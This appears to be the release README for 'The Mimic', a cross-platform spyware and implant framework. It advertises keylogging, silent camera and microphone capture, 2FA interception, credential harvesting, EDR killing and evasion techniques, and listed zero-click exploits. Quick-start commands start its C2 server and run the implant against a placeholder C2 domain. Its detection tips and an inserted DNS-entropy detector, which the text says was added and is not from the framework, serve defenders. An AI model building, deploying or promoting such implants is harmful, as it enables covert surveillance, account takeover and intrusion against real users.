Autonomous Behavioral Implant Framework
Windows + Android + iOS | 78 source files | 3.2 MB
Google VRP Status: "Working As Intended"
This framework was disclosed to Google through the Vulnerability Reward Program as a detection gap report against Google Play Protect. An APK built with this framework evaded Play Protect detection for 9+ days on a stock Android 16 device. Google closed the report as "Working As Intended." The appeal was denied. This is the public release.
| Date | Event |
|---|---|
| 2026-04-06 | Framework built and tested |
| 2026-04-06 | APK installed on test device (Samsung Galaxy, Android 16, stock ROM) |
| 2026-04-15 | 9-day undetected dwell confirmed. Filed Google Issue Tracker #502802174 |
| 2026-04-15 | Submitted detection gap report to Google VRP with APK sample |
| 2026-04-XX | Google response: "Working As Intended" |
| 2026-04-XX | Appeal filed |
| 2026-04-XX | Appeal denied |
| 2026-04-19 | Public release |
What "Working As Intended" means: Google's position is that Play Protect is a best-effort heuristic detection layer, not a security boundary. A 33KB APK with Accessibility Service god mode, keylogging, silent camera/microphone, TOTP interception, credential harvesting, and encrypted C2 sitting undetected on a stock device for over a week is, per Google, the expected behavior of their security product.
An implant framework that learns what "normal" looks like on a target device, then operates exclusively within that behavioral envelope. Every action the implant takes is statistically indistinguishable from the legitimate user's behavior.
The framework includes an autonomous decision engine (the "Brain") that profiles the target, classifies the machine's role, selects a mission, and executes without operator input. The operator's role shifts from directing the implant to reviewing its results.
EDR and mobile security products detect anomalies. If the implant generates zero anomalies, there is nothing to detect. The Mimic proves this thesis across three platforms.
Windows (Python): Behavioral learning, process parasitism (lives inside the user's foreground app), traffic-shaped DNS-over-HTTPS C2, NTFS ADS encrypted storage, autonomous targeting, credential harvesting, document intelligence, lateral movement.
C++ native: Indirect syscalls (JMP to ntdll gadget), BYOVD EDR kill (wsftprm.sys), Ekko sleep obfuscation, DKOM kernel callback removal, module stomping, patchless AMSI bypass, ETW blinding, stack spoofing.
Android: Accessibility Service god mode (keylogging, full screen reading, permission auto-grant, TOTP/2FA interception, messaging extraction from WhatsApp/Signal/Telegram/Discord, silent camera, silent microphone, GPS with geofencing, uninstall blocking). Four-layer persistence (boot receiver + FCM + WorkManager + alarms). Root persistence via system library replacement. FCM-based C2 over Google infrastructure.
iOS: Three implant variants (GHOSTBLADE/GHOSTSABER/GHOSTKNIFE). 60+ data categories. DarkSword-style JS-only architecture avoids SPTM and code signing. Native bridge for file I/O, SQLite, Keychain dump. Three-tier persistence: re-exploitation, LaunchDaemon, BCM4387 firmware (survives factory reset).
| Vector | Target | CVE | Type |
|---|---|---|---|
| iMessage DNG | iOS 18.0-18.6.1 | CVE-2025-43300 | Zero-click |
| Dolby RCS audio | Android | CVE-2025-54957 | Zero-click |
| Samsung DNG | Samsung Galaxy | CVE-2025-21042 | One-click |
| DarkSword watering hole | iOS 18.4-18.7.2 | 6 CVEs | One-click |
| Aladdin malvertising | Both | Unpatchable | Zero-click |
Full exploit chain source included in delivery/. The DarkSword chain is 38,618 lines covering RCE, sandbox escape, PAC bypass, and post-exploitation for iOS 18.4 through 18.7.2.
```bash
# Start C2 server
pip install flask
python infrastructure/mimic_unified_server.py --port 8443

# Launch operator console
python infrastructure/mimic_unified_operator.py --server https://localhost:8443

# Windows implant (demo mode)
python windows/mimic_orchestrator.py --demo --domain your-c2.com
```

```
The_Mimic/
  windows/         8 Python modules (profiler, brain, parasite, C2, ghost, orchestrator, lateral, dropper)
  cpp/             8 C++ modules (native implant with indirect syscalls, BYOVD, Ekko, DKOM)
  android/         3 Python + 6 Java + APK build scripts + manifests
  ios/             JS implant (3 variants) + Obj-C native bridge + persistence
  mobile_core/     5 shared mobile modules (brain, C2, GPS, harvest, core)
  delivery/        5 CVE exploit crafters + DarkSword chain (38K lines) + Scudo toolkit
  infrastructure/  Unified C2 server + operator console
  docs/            User manual (21 sections)
  WHITEPAPER.md    Full research paper
```
The Mimic defeats behavioral detection by eliminating the signal that detection depends on:
- Temporal: Only operates during the user's learned active hours
- Process: Lives inside the user's foreground application (no dedicated process)
- Network: DoH beacons shaped to match the user's connection baseline
- Storage: NTFS ADS with machine-bound encryption (invisible to Explorer)
- Kernel: Indirect syscalls from ntdll address space + DKOM callback removal
- Sleep: RC4-encrypted .text section during idle (defeats memory scanning)
- Mobile: Accessibility Service (legitimate system component) + FCM C2 (Google infrastructure)
If you are a defender, the white paper (WHITEPAPER.md) includes a full section on detection strategies. Key approaches:
- Establish behavioral baselines before infection, not after
- Monitor NTFS ADS creation on system files
- Scan user-space processes for injected RWX regions without backing modules
- Route DoH through corporate resolvers; apply DNS entropy analysis
- Alert on credential store access by non-browser processes
- Correlate across data sources (no single source reveals The Mimic)
- Monitor Accessibility Service grants and audit bound services
- Flag FCM message patterns inconsistent with legitimate app behavior
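As a worked example of the "route DoH through corporate resolvers; apply DNS entropy analysis" item above (added here; not code from the framework or its white paper): once DoH is forced through a resolver you log, the query names themselves can be scored. The log format, the client address, and the c2-placeholder.example base domain are constructed for the example.

```python
import math
import re
from collections import defaultdict

# Constructed resolver log (not from the page): "epoch client qname qtype".
# The random-looking labels and c2-placeholder.example are made up.
SAMPLE_LOG = """\
1712400001 10.0.0.12 www.example.com A
1712400002 10.0.0.12 mail.example.com A
1712400003 10.0.0.12 a9f3k2x7qz1m4lp0.c2-placeholder.example A
1712400004 10.0.0.12 7hs82kd9qwe4rtyu.c2-placeholder.example A
1712400005 10.0.0.12 bz91ql0x3nv8mc2k.c2-placeholder.example A
1712400006 10.0.0.12 cdn.example.com A
1712400007 10.0.0.12 ml5nx2vq8rt0zs6w.c2-placeholder.example A
"""
LINE_RE = re.compile(r"^(\d+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def shannon_entropy(label: str) -> float:
    """Bits per character; a label of all-distinct characters scores log2(len)."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def analyze(log_text: str, entropy_threshold: float = 3.5,
            min_label_len: int = 12, min_unique: int = 3) -> dict:
    """Flag (client, base domain) pairs that emit several distinct high-entropy
    leftmost labels, the pattern of data-carrying queries rather than hostnames."""
    suspicious = []                 # individual high-entropy queries
    per_pair = defaultdict(set)     # (client, base domain) -> distinct labels
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue                # malformed line: skip, never crash the pipeline
        _, client, qname, _ = m.groups()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:
            continue                # no leftmost label that could carry data
        first, base = labels[0], ".".join(labels[-2:])
        ent = shannon_entropy(first)
        if len(first) >= min_label_len and ent >= entropy_threshold:
            suspicious.append((client, qname, round(ent, 2)))
            per_pair[(client, base)].add(first)
    flagged = [(c, b, len(s)) for (c, b), s in per_pair.items() if len(s) >= min_unique]
    return {"suspicious": suspicious, "flagged": flagged}
```

Thresholds need tuning per environment: CDNs and telemetry services legitimately use hashed hostnames, so the per-pair distinct-label count matters more than any single query's score.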
This software is released for educational and defensive research purposes. See LICENSE for terms. Deployment against any system without explicit written authorization is prohibited.
The techniques documented here are not novel individually. Process injection, traffic shaping, ADS storage, accessibility abuse, and zero-click exploits all exist in documented offensive tooling and academic literature. The contribution is their integration into a coherent cross-platform evasion model with autonomous targeting, and the empirical demonstration that a major mobile security product fails to detect the result.
2026 -- Independent Security Research. Google Issue Tracker #502802174